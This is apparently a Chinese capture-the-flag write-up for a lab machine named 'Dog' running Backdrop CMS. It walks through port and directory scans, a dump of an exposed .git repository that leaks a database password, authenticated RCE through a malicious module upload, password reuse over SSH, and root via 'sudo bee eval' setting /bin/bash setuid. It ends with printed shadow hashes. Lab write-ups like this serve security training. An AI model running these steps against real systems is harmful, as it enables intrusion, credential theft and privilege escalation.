基本信息

端口扫描

22和80:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
$ nmap -sC -sV -Pn 10.10.11.58
Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-10 14:11 CST
Nmap scan report for 10.10.11.58
Host is up (0.066s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.12 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 97:2a:d2:2c:89:8a:d3:ed:4d:ac:00:d2:1e:87:49:a7 (RSA)
|   256 27:7c:3c:eb:0f:26:e9:62:59:0f:0f:b1:38:c9:ae:2b (ECDSA)
|_  256 93:88:47:4c:69:af:72:16:09:4c:ba:77:1e:3b:3b:eb (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-generator: Backdrop CMS 1 (https://backdropcms.org)
| http-git:
|   10.10.11.58:80/.git/
|     Git repository found!
|     Repository description: Unnamed repository; edit this file 'description' to name the...
|_    Last commit message: todo: customize url aliases.  reference:https://docs.backdro...
|_http-title: Home | Dog
|_http-server-header: Apache/2.4.41 (Ubuntu)
| http-robots.txt: 22 disallowed entries (15 shown)
| /core/ /profiles/ /README.md /web.config /admin
| /comment/reply /filter/tips /node/add /search /user/register
|_/user/password /user/login /user/logout /?q=admin /?q=comment/reply
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 30.81 seconds

80

一个使用Backdrop CMS的博客:

目录扫描

目录扫描发现git泄漏:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
gobuster dir -w ~/Tools/dict/SecLists/Discovery/Web-Content/common.txt -t 50 -u http://10.10.11.58/

/.git/HEAD            (Status: 200) [Size: 23]
/.git                 (Status: 301) [Size: 309] [--> http://10.10.11.58/.git/]
/.git/config          (Status: 200) [Size: 92]
/.git/logs/           (Status: 200) [Size: 1130]
/.git/index           (Status: 200) [Size: 344667]
/.htaccess            (Status: 403) [Size: 276]
/.htpasswd            (Status: 403) [Size: 276]
/.hta                 (Status: 403) [Size: 276]
/core                 (Status: 301) [Size: 309] [--> http://10.10.11.58/core/]
/files                (Status: 301) [Size: 310] [--> http://10.10.11.58/files/]
/index.php            (Status: 200) [Size: 13332]
/layouts              (Status: 301) [Size: 312] [--> http://10.10.11.58/layouts/]
/modules              (Status: 301) [Size: 312] [--> http://10.10.11.58/modules/]
/robots.txt           (Status: 200) [Size: 1198]
/server-status        (Status: 403) [Size: 276]
/sites                (Status: 301) [Size: 310] [--> http://10.10.11.58/sites/]
/themes               (Status: 301) [Size: 311] [--> http://10.10.11.58/themes/]

dog git

常规git dump:

1
git-dumper http://10.10.11.58/ dog_git

然后在setting里可以得到一个密码:

1
$database = 'mysql://root:BackDropJ2024DS2024@127.0.0.1/backdrop';

另外搜索也可以找到一个用户名:

1
2
$ grep -irn '@dog.htb' .
./files/config_83dddd18e1ec67fd8ff5bba2453c7fb3/active/update.settings.json:12:        "tiffany@dog.htb"

Backdrop CMS

使用得到的用户名密码登录,发现Backdrop CMS版本1.27.1:

1
2
tiffany@dog.htb
BackDropJ2024DS2024

搜索可以发现相关漏洞:

rce

exp里是zip文件,这个环境需要tar,自己手动改下即可

1
tar -zcvf shell.tar.gz shell

上传模块,激活,访问执行命令得到www-data:

查看用户目录可以看到两个用户:

1
2
jobert
johncusack

user flag

johncusack复用了已知的密码,ssh登录:

提权信息

johncusack可以sudo运行bee,查看支持的参数,发现可以执行任意php代码:

提权 & root flag

所以就是sudo运行bee执行php代码:

1
sudo /usr/local/bin/bee --root=/var/www/html eval 'exec("chmod +s /bin/bash")'

shadow

1
2
3
root:$6$buHS/pADc6PYMPvf$XTArYbNF62hfC04MHiAhaXHeWdUblAeXNLc/SbN7baQRUfHgIhmklPJfj2u7HZp9qb6gpFyXVnicT4FvRJ4Nm/:20117:0:99999:7:::
jobert:$6$9NZzmqUK4cJcMtd/$.CO/yezHu0S6cUZdPcd2QHfg3YVM7VUCMlHUvTCF.J7dMFB8sdNerBjIwe.l5YHZcXn2c0lkux5jI8eaC0B/x/:19950:0:99999:7:::
johncusack:$6$70rLgjVTNIxmr6zb$N2vsXuYZ7rug6ksshK5Jdwp0mUrQ.KvH3t73ycJe87QxNFw96GV.V/GEYWtzM/Cc..ISjhaleee5/uP29XZzM.:19950:0:99999:7:::

参考资料